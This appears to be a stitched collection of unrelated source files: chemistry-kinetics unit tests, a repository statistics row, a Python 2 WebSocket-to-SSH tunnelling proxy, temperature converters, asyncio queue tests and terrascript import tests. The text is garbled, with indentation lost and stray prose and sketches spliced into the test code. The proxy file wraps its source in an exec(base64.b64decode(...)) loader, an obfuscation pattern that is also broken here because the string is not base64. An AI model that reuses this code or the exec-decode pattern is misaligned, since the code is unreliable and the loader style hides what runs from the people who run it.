            self.assertAlmostEqual(arrh0.T0.value, arrh.T0.value, 4)
            self.assertEqual(arrh0.T0.units, arrh.T0.units)
        self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
        self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
        self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
        self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
        self.assertEqual(self.kinetics.comment, kinetics.comment)

    def test_repr(self):
        """
        Test that a MultiArrhenius object can be reconstructed from its repr()
        output with no loss of information.
        """
        namespace = {}
        exec('kinetics = {0!r}'.format(self.kinetics), globals(), namespace)
        self.assertIn('kinetics', namespace)
        kinetics = namespace['kinetics']
        self.assertEqual(len(self.kinetics.arrhenius), len(kinetics.arrhenius))
        for arrh0, arrh in zip(self.kinetics.arrhenius, kinetics.arrhenius):
            self.assertAlmostEqual(arrh0.A.value, arrh.A.value, delta=1e-18)
            self.assertEqual(arrh0.A.units, arrh.A.units)
            self.assertAlmostEqual(arrh0.n.value, arrh.n.value, 4)
            self.assertAlmostEqual(arrh0.Ea.value, arrh.Ea.value, 4)
            self.assertEqual(arrh0.Ea.units, arrh.Ea.units)
            self.assertAlmostEqual(arrh0.T0.value, arrh.T0.value, 4)
            self.assertEqual(arrh0.T0.units, arrh.T0.units)
        self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
        self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
        self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
        self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
self.assertEqual(self.kinetics.comment, kinetics.comment)
def test_to_arrhenius(self):
"""
Test that we can convert to an Arrhenius
"""
answer = self.single_kinetics.arrhenius[0]
fitted = self.single_kinetics.to_arrhenius()
self.assertAlmostEqual(fitted.A.value_si, answer.A.value_si, delta=1e0)
        self.assertAlmostEqual(fitted.n.value_si, answer.n.value_si, 1)
self.assertAlmostEqual(fitted.Ea.value_si, answer.Ea.value_si, 2)
self.assertAlmostEqual(fitted.T0.value_si, answer.T0.value_si, 4)
def test_to_arrhenius_temperature_range(self):
"""
Test the to_arrhenius temperature range is set correctly.
"""
answer = self.single_kinetics.arrhenius[0]
fitted = self.single_kinetics.to_arrhenius(Tmin=800, Tmax=1200)
self.assertAlmostEqual(fitted.Tmin.value_si, 800.0)
self.assertAlmostEqual(fitted.Tmax.value_si, 1200.0)
for T in [800, 1000, 1200]:
self.assertAlmostEqual(fitted.get_rate_coefficient(T) / answer.get_rate_coefficient(T), 1.0)
def test_to_arrhenius_multiple(self):
"""
Test the to_arrhenius fitting multiple kinetics over a small range, see if we're within 5% at a few points
"""
answer = self.kinetics
fitted = self.kinetics.to_arrhenius(Tmin=800, Tmax=1200)
self.assertAlmostEqual(fitted.Tmin.value_si, 800.0)
self.assertAlmostEqual(fitted.Tmax.value_si, 1200.0)
for T in [800, 1000, 1200]:
self.assertAlmostEqual(fitted.get_rate_coefficient(T) / answer.get_rate_coefficient(T), 1.0, delta=0.05)
def test_change_rate(self):
"""
Test the MultiArrhenius.change_rate() method.
"""
Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
k0list = np.array([self.kinetics.get_rate_coefficient(T) for T in Tlist])
self.kinetics.change_rate(2)
for T, kexp in zip(Tlist, k0list):
kact = self.kinetics.get_rate_coefficient(T)
self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
################################################################################
class TestMultiPDepArrhenius(unittest.TestCase):
"""
Contains unit tests of the :class:`MultiPDepArrhenius` class.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
self.Tmin = 350.
self.Tmax = 1500.
self.Pmin = 1e-1
self.Pmax = 1e1
self.pressures = np.array([1e-1, 1e1])
self.comment = 'CH3 + C2H6 <=> CH4 + C2H5 (Baulch 2005)'
self.arrhenius = [
PDepArrhenius(
pressures=(self.pressures, "bar"),
arrhenius=[
Arrhenius(
A=(9.3e-16, "cm^3/(molecule*s)"),
n=0.0,
Ea=(4740 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
Arrhenius(
A=(9.3e-14, "cm^3/(molecule*s)"),
n=0.0,
Ea=(4740 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
],
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
Pmin=(self.Pmin, "bar"),
Pmax=(self.Pmax, "bar"),
comment=self.comment,
),
PDepArrhenius(
pressures=(self.pressures, "bar"),
arrhenius=[
Arrhenius(
A=(1.4e-11, "cm^3/(molecule*s)"),
n=0.0,
Ea=(11200 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
Arrhenius(
A=(1.4e-9, "cm^3/(molecule*s)"),
n=0.0,
Ea=(11200 * constants.R * 0.001, "kJ/mol"),
T0=(1, "K"),
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
comment=self.comment,
),
],
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
Pmin=(self.Pmin, "bar"),
Pmax=(self.Pmax, "bar"),
comment=self.comment,
),
]
self.kinetics = MultiPDepArrhenius(
arrhenius=self.arrhenius,
Tmin=(self.Tmin, "K"),
Tmax=(self.Tmax, "K"),
Pmin=(self.Pmin, "bar"),
Pmax=(self.Pmax, "bar"),
comment=self.comment,
)
def test_arrhenius(self):
"""
Test that the MultiPDepArrhenius arrhenius property was properly set.
"""
self.assertEqual(self.kinetics.arrhenius, self.arrhenius)
def test_temperature_min(self):
"""
Test that the MultiPDepArrhenius Tmin property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Tmin.value_si, self.Tmin, 6)
def test_temperature_max(self):
"""
Test that the MultiPDepArrhenius Tmax property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Tmax.value_si, self.Tmax, 6)
def test_pressure_min(self):
"""
Test that the MultiPDepArrhenius Pmin property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Pmin.value_si * 1e-5, self.Pmin, 6)
def test_pressure_max(self):
"""
Test that the MultiPDepArrhenius Pmax property was properly set.
"""
self.assertAlmostEqual(self.kinetics.Pmax.value_si * 1e-5, self.Pmax, 6)
def test_comment(self):
"""
Test that the MultiPDepArrhenius comment property was properly set.
"""
self.assertEqual(self.kinetics.comment, self.comment)
def test_is_temperature_valid(self):
"""
Test the MultiPDepArrhenius.is_temperature_valid() method.
"""
Tdata = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
        validdata = np.array([False, True, True, True, True, True, True, False, False, False], bool)
for T, valid in zip(Tdata, validdata):
valid0 = self.kinetics.is_temperature_valid(T)
self.assertEqual(valid0, valid)
def test_is_pressure_valid(self):
"""
Test the MultiPDepArrhenius.is_pressure_valid() method.
"""
Pdata = np.array([1e3, 1e4, 1e5, 1e6, 1e7])
        validdata = np.array([False, True, True, True, False], bool)
for P, valid in zip(Pdata, validdata):
valid0 = self.kinetics.is_pressure_valid(P)
self.assertEqual(valid0, valid)
def test_get_rate_coefficient(self):
"""
Test the MultiPDepArrhenius.get_rate_coefficient() method.
"""
Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
Plist = np.array([1e4, 1e5, 1e6])
kexplist = np.array([
[2.85400e-08, 4.00384e-03, 2.73563e-01, 8.50699e+00, 1.20181e+02, 7.56312e+02, 2.84724e+03, 7.71702e+03,
1.67743e+04, 3.12290e+04],
[2.85400e-07, 4.00384e-02, 2.73563e+00, 8.50699e+01, 1.20181e+03, 7.56312e+03, 2.84724e+04, 7.71702e+04,
1.67743e+05, 3.12290e+05],
[2.85400e-06, 4.00384e-01, 2.73563e+01, 8.50699e+02, 1.20181e+04, 7.56312e+04, 2.84724e+05, 7.71702e+05,
1.67743e+06, 3.12290e+06],
]).T
for i in range(Tlist.shape[0]):
for j in range(Plist.shape[0]):
kexp = kexplist[i, j]
kact = self.kinetics.get_rate_coefficient(Tlist[i], Plist[j])
self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
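Each PDepArrhenius channel here is tabulated at 0.1 and 10 bar with rates 100x apart, and the expected values scale by exactly 10x per decade of pressure — consistent with interpolating log k linearly in log P between the tabulated pressures. A minimal sketch of that interpolation (my own assumption about the scheme, independent of RMG-Py):

```python
import math

def interp_log_p(k_lo, k_hi, p_lo, p_hi, p):
    """Interpolate a rate coefficient log-linearly in log(pressure)."""
    frac = (math.log(p) - math.log(p_lo)) / (math.log(p_hi) - math.log(p_lo))
    return math.exp((1.0 - frac) * math.log(k_lo) + frac * math.log(k_hi))
```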
def test_get_rate_coefficient_diff_plist(self):
"""
Test the MultiPDepArrhenius.get_rate_coefficient() when plists are different.
"""
# modify the MultiPDepArrhenius object with an additional entry
pressures = np.array([1e-1, 1e-1, 1e1])
self.kinetics.arrhenius[0].pressures = (pressures, "bar")
self.kinetics.arrhenius[0].arrhenius.insert(0, self.kinetics.arrhenius[0].arrhenius[0])
Tlist = np.array([200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000])
Plist = np.array([1e4, 1e5, 1e6])
kexplist = np.array([
[2.85400e-08, 4.00384e-03, 2.73563e-01, 8.50699e+00, 1.20181e+02, 7.56312e+02, 2.84724e+03, 7.71702e+03,
1.67743e+04, 3.12290e+04],
[2.85400e-07, 4.00384e-02, 2.73563e+00, 8.50699e+01, 1.20181e+03, 7.56312e+03, 2.84724e+04, 7.71702e+04,
1.67743e+05, 3.12290e+05],
[2.85400e-06, 4.00384e-01, 2.73563e+01, 8.50699e+02, 1.20181e+04, 7.56312e+04, 2.84724e+05, 7.71702e+05,
1.67743e+06, 3.12290e+06],
]).T
for i in range(Tlist.shape[0]):
for j in range(Plist.shape[0]):
kexp = kexplist[i, j]
kact = self.kinetics.get_rate_coefficient(Tlist[i], Plist[j])
self.assertAlmostEqual(kexp, kact, delta=1e-4 * kexp)
def test_pickle(self):
"""
Test that a MultiPDepArrhenius object can be pickled and unpickled with
no loss of information.
"""
import pickle
kinetics = pickle.loads(pickle.dumps(self.kinetics, -1))
self.assertEqual(len(self.kinetics.arrhenius), len(kinetics.arrhenius))
self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
self.assertEqual(self.kinetics.comment, kinetics.comment)
def test_repr(self):
"""
Test that a MultiPDepArrhenius object can be reconstructed from its
repr() output with no loss of information.
"""
namespace = {}
exec('kinetics = {0!r}'.format(self.kinetics), globals(), namespace)
self.assertIn('kinetics', namespace)
kinetics = namespace['kinetics']
self.assertEqual(len(self.kinetics.arrhenius), len(kinetics.arrhenius))
self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
self.assertEqual(self.kinetics.comment, kinetics.comment)
def test_change_rate(self):
"""
        Test the MultiPDepArrhenius.change_rate() method.
"""
Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
k0list = np.array([self.kinetics.get_rate_coefficient(T, 1e5) for T in Tlist])
self.kinetics.change_rate(2)
for T, kexp in zip(Tlist, k0list):
kact = self.kinetics.get_rate_coefficient(T, 1e5)
self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
def test_generate_reverse_rate_coefficient(self):
"""
Test ability to reverse a reaction rate.
This is a real example from an imported chemkin file.
"""
from rmgpy.species import Species
from rmgpy.molecule import Molecule
from rmgpy.data.kinetics import LibraryReaction
from rmgpy.thermo import NASA, NASAPolynomial
test_reaction = LibraryReaction(reactants=[Species(label="C2H3", thermo=NASA(polynomials=[NASAPolynomial(coeffs=[3.12502,0.00235137,2.36803e-05,-3.35092e-08,1.39444e-11,34524.3,8.81538], Tmin=(200,"K"), Tmax=(1000,"K")), NASAPolynomial(coeffs=[4.37211,0.00746869,-2.64716e-06,4.22753e-10,-2.44958e-14,33805.2,0.428772], Tmin=(1000,"K"), Tmax=(6000,"K"))], Tmin=(200,"K"), Tmax=(6000,"K"), E0=(285.696,"kJ/mol"), Cp0=(33.2579,"J/mol/K"), CpInf=(108.088,"J/mol/K"), comment="""ATcT3E\nC2H3 <g> ATcT ver. 1.122, DHf298 = 296.91 ± 0.33 kJ/mol - fit JAN17"""), molecule=[Molecule(smiles="[CH]=C")], molecular_weight=(27.0452,"amu")),
Species(label="CH2O", thermo=NASA(polynomials=[NASAPolynomial(coeffs=[4.77187,-0.00976266,3.70122e-05,-3.76922e-08,1.31327e-11,-14379.8,0.696586], Tmin=(200,"K"), Tmax=(1000,"K")), NASAPolynomial(coeffs=[2.91333,0.0067004,-2.55521e-06,4.27795e-10,-2.44073e-14,-14462.2,7.43823], Tmin=(1000,"K"), Tmax=(6000,"K"))], Tmin=(200,"K"), Tmax=(6000,"K"), E0=(-119.527,"kJ/mol"), Cp0=(33.2579,"J/mol/K"), CpInf=(83.1447,"J/mol/K"), comment="""ATcT3E\nH2CO <g> ATcT ver. 1.122, DHf298 = -109.188 ± 0.099 kJ/mol - fit JAN17"""), molecule=[Molecule(smiles="C=O")], molecular_weight=(30.026,"amu"))],
products=[Species(label="C2H4", thermo=NASA(polynomials=[NASAPolynomial(coeffs=[3.65151,-0.00535067,5.16486e-05,-6.36869e-08,2.50743e-11,5114.51,5.38561], Tmin=(200,"K"), Tmax=(1000,"K")), NASAPolynomial(coeffs=[4.14446,0.0102648,-3.61247e-06,5.74009e-10,-3.39296e-14,4190.59,-1.14778], Tmin=(1000,"K"), Tmax=(6000,"K"))], Tmin=(200,"K"), Tmax=(6000,"K"), E0=(42.06,"kJ/mol"), Cp0=(33.2579,"J/mol/K"), CpInf=(133.032,"J/mol/K"), comment="""ATcT3E\nC2H4 <g> ATcT ver. 1.122, DHf298 = 52.45 ± 0.13 kJ/mol - fit JAN17"""), molecule=[Molecule(smiles="C=C")], molecular_weight=(28.0532,"amu")),
Species(label="HCO", thermo=NASA(polynomials=[NASAPolynomial(coeffs=[3.97075,-0.00149122,9.54042e-06,-8.8272e-09,2.67645e-12,3842.03,4.4466], Tmin=(200,"K"), Tmax=(1000,"K")), NASAPolynomial(coeffs=[3.85781,0.00264114,-7.44177e-07,1.23313e-10,-8.88959e-15,3616.43,3.92451], Tmin=(1000,"K"), Tmax=(6000,"K"))], Tmin=(200,"K"), Tmax=(6000,"K"), E0=(32.0237,"kJ/mol"), Cp0=(33.2579,"J/mol/K"), CpInf=(58.2013,"J/mol/K"), comment="""HCO <g> ATcT ver. 1.122, DHf298 = 41.803 ± 0.099 kJ/mol - fit JAN17"""), molecule=[Molecule(smiles="[CH]=O")], molecular_weight=(29.018,"amu"))],
kinetics=MultiPDepArrhenius(arrhenius=[PDepArrhenius(pressures=([0.001,0.01,0.1,1,10,100,1000],"atm"),
arrhenius=[Arrhenius(A=(1.1e+07,"cm^3/(mol*s)"), n=1.09, Ea=(1807,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(2.5e+07,"cm^3/(mol*s)"), n=0.993, Ea=(1995,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(2.5e+08,"cm^3/(mol*s)"), n=0.704, Ea=(2596,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(1.4e+10,"cm^3/(mol*s)"), n=0.209, Ea=(3934,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(3.5e+13,"cm^3/(mol*s)"), n=-0.726, Ea=(6944,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(3.3e+14,"cm^3/(mol*s)"), n=-0.866, Ea=(10966,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(17,"cm^3/(mol*s)"), n=3.17, Ea=(9400,"cal/mol"), T0=(1,"K"))]),
PDepArrhenius(pressures=([0.001,0.01,0.1,1,10,100,1000],"atm"),
arrhenius=[Arrhenius(A=(-2.3e+16,"cm^3/(mol*s)"), n=-1.269, Ea=(20617,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-5.2e+16,"cm^3/(mol*s)"), n=-1.366, Ea=(20805,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-1.5e+18,"cm^3/(mol*s)"), n=-1.769, Ea=(22524,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-8.5e+19,"cm^3/(mol*s)"), n=-2.264, Ea=(23862,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-4.4e+23,"cm^3/(mol*s)"), n=-3.278, Ea=(27795,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-4.2e+24,"cm^3/(mol*s)"), n=-3.418, Ea=(31817,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-2.1e+11,"cm^3/(mol*s)"), n=0.618, Ea=(30251,"cal/mol"), T0=(1,"K"))])
]), duplicate=True)
test_reaction.generate_reverse_rate_coefficient()
| 49.211018 | 639 | 0.583114 | 6,487 | 52,705 | 4.677817 | 0.087868 | 0.088581 | 0.065085 | 0.046762 | 0.843368 | 0.811204 | 0.787939 | 0.769023 | 0.722294 | 0.700676 | 0 | 0.084075 | 0.27468 | 52,705 | 1,070 | 640 | 49.257009 | 0.709611 | 0.134731 | 0 | 0.74818 | 0 | 0.005822 | 0.031056 | 0 | 0 | 0 | 0 | 0 | 0.328967 | 1 | 0.10917 | false | 0 | 0.020378 | 0 | 0.136827 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# File: websocket/ws-openssh.py
#My Team : Nusa Tenggara Barat
import base64
exec(base64.b64decode("#!/usr/bin/python
import socket, threading, thread, select, signal, sys, time, getopt

# Listen
LISTENING_ADDR = '0.0.0.0'
if sys.argv[1:]:
	LISTENING_PORT = sys.argv[1]
else:
	LISTENING_PORT = 2095

# Pass
PASS = ''

# CONST
BUFLEN = 4096 * 4
TIMEOUT = 60
DEFAULT_HOST = '127.0.0.1:22'
RESPONSE = 'HTTP/1.1 101 <b><h1><h><font color="fuchsia"> Geo Switching Protocols</font></b>\r\n\r\nContent-Length: 104857600000\r\n\r\n'

class Server(threading.Thread):
    def __init__(self, host, port):
        threading.Thread.__init__(self)
        self.running = False
        self.host = host
        self.port = port
        self.threads = []
        self.threadsLock = threading.Lock()
        self.logLock = threading.Lock()

    def run(self):
        self.soc = socket.socket(socket.AF_INET)
        self.soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.soc.settimeout(2)
        intport = int(self.port)
        self.soc.bind((self.host, intport))
        self.soc.listen(0)
        self.running = True

        try:
            while self.running:
                try:
                    c, addr = self.soc.accept()
                    c.setblocking(1)
                except socket.timeout:
                    continue

                conn = ConnectionHandler(c, self, addr)
                conn.start()
                self.addConn(conn)
        finally:
            self.running = False
            self.soc.close()

    def printLog(self, log):
        self.logLock.acquire()
        print log
        self.logLock.release()

    def addConn(self, conn):
        try:
            self.threadsLock.acquire()
            if self.running:
                self.threads.append(conn)
        finally:
            self.threadsLock.release()

    def removeConn(self, conn):
        try:
            self.threadsLock.acquire()
            self.threads.remove(conn)
        finally:
            self.threadsLock.release()

    def close(self):
        try:
            self.running = False
            self.threadsLock.acquire()

            threads = list(self.threads)
            for c in threads:
                c.close()
        finally:
            self.threadsLock.release()


class ConnectionHandler(threading.Thread):
    def __init__(self, socClient, server, addr):
        threading.Thread.__init__(self)
        self.clientClosed = False
        self.targetClosed = True
        self.client = socClient
        self.client_buffer = ''
        self.server = server
        self.log = 'Connection: ' + str(addr)

    def close(self):
        try:
            if not self.clientClosed:
                self.client.shutdown(socket.SHUT_RDWR)
                self.client.close()
        except:
            pass
        finally:
            self.clientClosed = True

        try:
            if not self.targetClosed:
                self.target.shutdown(socket.SHUT_RDWR)
                self.target.close()
        except:
            pass
        finally:
            self.targetClosed = True

    def run(self):
        try:
            self.client_buffer = self.client.recv(BUFLEN)

            hostPort = self.findHeader(self.client_buffer, 'X-Real-Host')

            if hostPort == '':
                hostPort = DEFAULT_HOST

            split = self.findHeader(self.client_buffer, 'X-Split')

            if split != '':
                self.client.recv(BUFLEN)

            if hostPort != '':
                passwd = self.findHeader(self.client_buffer, 'X-Pass')
				
                if len(PASS) != 0 and passwd == PASS:
                    self.method_CONNECT(hostPort)
                elif len(PASS) != 0 and passwd != PASS:
                    self.client.send('HTTP/1.1 400 WrongPass!\r\n\r\n')
                elif hostPort.startswith('127.0.0.1') or hostPort.startswith('localhost'):
                    self.method_CONNECT(hostPort)
                else:
                    self.client.send('HTTP/1.1 403 Forbidden!\r\n\r\n')
            else:
                print '- No X-Real-Host!'
                self.client.send('HTTP/1.1 400 NoXRealHost!\r\n\r\n')

        except Exception as e:
            self.log += ' - error: ' + str(e)
            self.server.printLog(self.log)
        finally:
            self.close()
            self.server.removeConn(self)

    def findHeader(self, head, header):
        aux = head.find(header + ': ')

        if aux == -1:
            return ''

        aux = head.find(':', aux)
        head = head[aux+2:]
        aux = head.find('\r\n')

        if aux == -1:
            return ''

        return head[:aux];
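findHeader above does naive substring scanning of the raw request buffer; an equivalent standalone Python 3 sketch (the name find_header is my own), handy for testing the parsing logic in isolation:

```python
def find_header(head, header):
    """Return the value of `header` from a raw HTTP request string, or ''."""
    aux = head.find(header + ': ')
    if aux == -1:
        return ''
    aux = head.find(':', aux)
    head = head[aux + 2:]
    aux = head.find('\r\n')
    if aux == -1:
        return ''
    return head[:aux]
```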

    def connect_target(self, host):
        i = host.find(':')
        if i != -1:
            port = int(host[i+1:])
            host = host[:i]
        else:
            if self.method=='CONNECT':
                port = 443
            else:
                port = sys.argv[1]

        (soc_family, soc_type, proto, _, address) = socket.getaddrinfo(host, port)[0]

        self.target = socket.socket(soc_family, soc_type, proto)
        self.targetClosed = False
        self.target.connect(address)

    def method_CONNECT(self, path):
        self.log += ' - CONNECT ' + path

        self.connect_target(path)
        self.client.sendall(RESPONSE)
        self.client_buffer = ''

        self.server.printLog(self.log)
        self.doCONNECT()

    def doCONNECT(self):
        socs = [self.client, self.target]
        count = 0
        error = False
        while True:
            count += 1
            (recv, _, err) = select.select(socs, [], socs, 3)
            if err:
                error = True
            if recv:
                for in_ in recv:
                    try:
                        data = in_.recv(BUFLEN)
                        if data:
                            if in_ is self.target:
                                self.client.send(data)
                            else:
                                while data:
                                    byte = self.target.send(data)
                                    data = data[byte:]

                            count = 0
                        else:
                            break
                    except:
                        error = True
                        break
            if count == TIMEOUT:
                error = True
            if error:
                break


def print_usage():
    print 'Usage: proxy.py -p <port>'
    print '       proxy.py -b <bindAddr> -p <port>'
    print '       proxy.py -b 0.0.0.0 -p 80'

def parse_args(argv):
    global LISTENING_ADDR
    global LISTENING_PORT
    
    try:
        opts, args = getopt.getopt(argv,"hb:p:",["bind=","port="])
    except getopt.GetoptError:
        print_usage()
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print_usage()
            sys.exit()
        elif opt in ("-b", "--bind"):
            LISTENING_ADDR = arg
        elif opt in ("-p", "--port"):
            LISTENING_PORT = int(arg)


def main(host=LISTENING_ADDR, port=LISTENING_PORT):
    print "\n:-------PythonProxy-------:\n"
    print "Listening addr: " + LISTENING_ADDR
    print "Listening port: " + str(LISTENING_PORT) + "\n"
    print ":-------------------------:\n"
    server = Server(LISTENING_ADDR, LISTENING_PORT)
    server.start()
    while True:
        try:
            time.sleep(2)
        except KeyboardInterrupt:
            print 'Stopping...'
            server.close()
            break

#######    parse_args(sys.argv[1:])
if __name__ == '__main__':
    main()
# File: lib/tmp102/convertors.py
class Fahrenheit(object):
def convert_from(self, temperature):
return (temperature - 32.0) / 1.8
def convert_to(self, temperature):
return (temperature * 1.8) + 32.0
class Kelvin(object):
def convert_from(self, temperature):
return temperature - 273.15
def convert_to(self, temperature):
return temperature + 273.15
# File: pytests/utils/asynctools/test_push_each_to_queue.py
Tests for aitools.utils.asynctools.push_each_to_queue
Implemented cases:
completion__limited_queue
processes the whole input, with a queue of max_size=1
completion__unlimited_queue
processes the whole input, with an unlimited queue
failing_input__limited_queue
the input raises an exception which is pushed as a result, with a queue of max_size=1
failing_input__unlimited_queue
the input raises an exception which is pushed as a result, with an unlimited queue
cancelled_during_body__limited_queue
the coroutine is cancelled during its own 'await', with a queue of max_size=1
cancelled_while_in_subroutine__limited_queue
the coroutine is cancelled while in a subroutine, with a queue of max_size=1
cancelled_while_in_subroutine__unlimited_queue
the coroutine is cancelled while in a subroutine, with an unlimited queue
NOTE: there is no cancelled_during_body__unlimited_queue, since it doesn't yield control during queue.put
"""
import asyncio
import pytest
from aitools.utils import asynctools
from pytests.utils.asynctools.utils import yield_then_fail, SomeException, step, await_yield_and_log
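These tests drive coroutines by hand rather than through an event loop. The step helper is imported from the local test utils; a minimal sketch of what such a helper can look like (an assumption — the real implementation may differ) is a single send(None), which advances the coroutine to its next suspension point and lets StopIteration propagate when it finishes:

```python
def step(coro):
    """Advance a coroutine one scheduling point; StopIteration means done."""
    coro.send(None)
```

Each call runs the coroutine up to its next suspension, which is what lets the tests interleave queue.get_nowait() checks between steps.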
def test__completion__limited_queue():
iterations = 10
source = asynctools.asynchronize(range(iterations))
poison_pill = object()
queue = asyncio.Queue(maxsize=1)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
step(coro)
with pytest.raises(StopIteration):
for i in range(iterations):
assert queue.get_nowait() == i
step(coro)
assert queue.get_nowait() is poison_pill
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__completion__unlimited_queue():
iterations = 10
source = asynctools.asynchronize(range(iterations))
poison_pill = object()
queue = asyncio.Queue(maxsize=0)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
with pytest.raises(StopIteration):
step(coro)
for i in range(iterations):
assert queue.get_nowait() == i
assert queue.get_nowait() is poison_pill
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__failing_input__limited_queue():
iterations = 10
source = yield_then_fail('some_result', iterations)
poison_pill = object()
queue = asyncio.Queue(maxsize=1)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
step(coro)
with pytest.raises(StopIteration):
for i in range(iterations):
assert queue.get_nowait() == f"some_result-{i}"
step(coro)
assert isinstance(queue.get_nowait(), SomeException)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__failing_input__unlimited_queue():
iterations = 10
source = yield_then_fail('some_result', iterations)
poison_pill = object()
queue = asyncio.Queue(maxsize=0)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
with pytest.raises(StopIteration):
step(coro)
for i in range(iterations):
assert queue.get_nowait() == f"some_result-{i}"
assert isinstance(queue.get_nowait(), SomeException)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__cancelled_during_body__limited_queue():
log = []
iterations = 10
source = await_yield_and_log(iterations, log=log)
poison_pill = object()
queue = asyncio.Queue(maxsize=1)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
for i in range(iterations - 3):
step(coro)
step(coro)
assert queue.get_nowait() == i
assert log == list(range(iterations - 2))
with pytest.raises(asyncio.CancelledError):
coro.throw(asyncio.CancelledError)
assert len(log) == iterations - 1
assert isinstance(log[-1], GeneratorExit)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__cancelled_while_in_subroutine__limited_queue():
log = []
iterations = 10
source = await_yield_and_log(iterations, log=log)
poison_pill = object()
queue = asyncio.Queue(maxsize=1)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
for i in range(iterations - 3):
step(coro)
step(coro)
assert queue.get_nowait() == i
assert log == list(range(iterations - 2))
step(coro)
assert queue.get_nowait() == iterations - 3
assert log == list(range(iterations - 2))
with pytest.raises(asyncio.CancelledError):
coro.throw(asyncio.CancelledError)
assert len(log) == iterations - 1
assert isinstance(log[-1], asyncio.CancelledError)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__cancelled_while_in_subroutine__unlimited_queue():
log = []
iterations = 10
source = await_yield_and_log(iterations, log=log)
poison_pill = object()
queue = asyncio.Queue(maxsize=0)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
step(coro)
for i in range(iterations - 3):
step(coro)
assert queue.get_nowait() == i
assert log == list(range(iterations - 3))
with pytest.raises(asyncio.CancelledError):
coro.throw(asyncio.CancelledError)
assert len(log) == iterations - 2
assert isinstance(log[-1], asyncio.CancelledError)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
# Automatically generated by tools/makecode.py (24-Sep-2021 15:28:36 UTC)

def test_provider_import():
    import terrascript.provider.hashicorp.tfe


def test_resource_import():
    from terrascript.resource.hashicorp.tfe import tfe_agent_pool
    from terrascript.resource.hashicorp.tfe import tfe_agent_token
    from terrascript.resource.hashicorp.tfe import tfe_notification_configuration
    from terrascript.resource.hashicorp.tfe import tfe_oauth_client
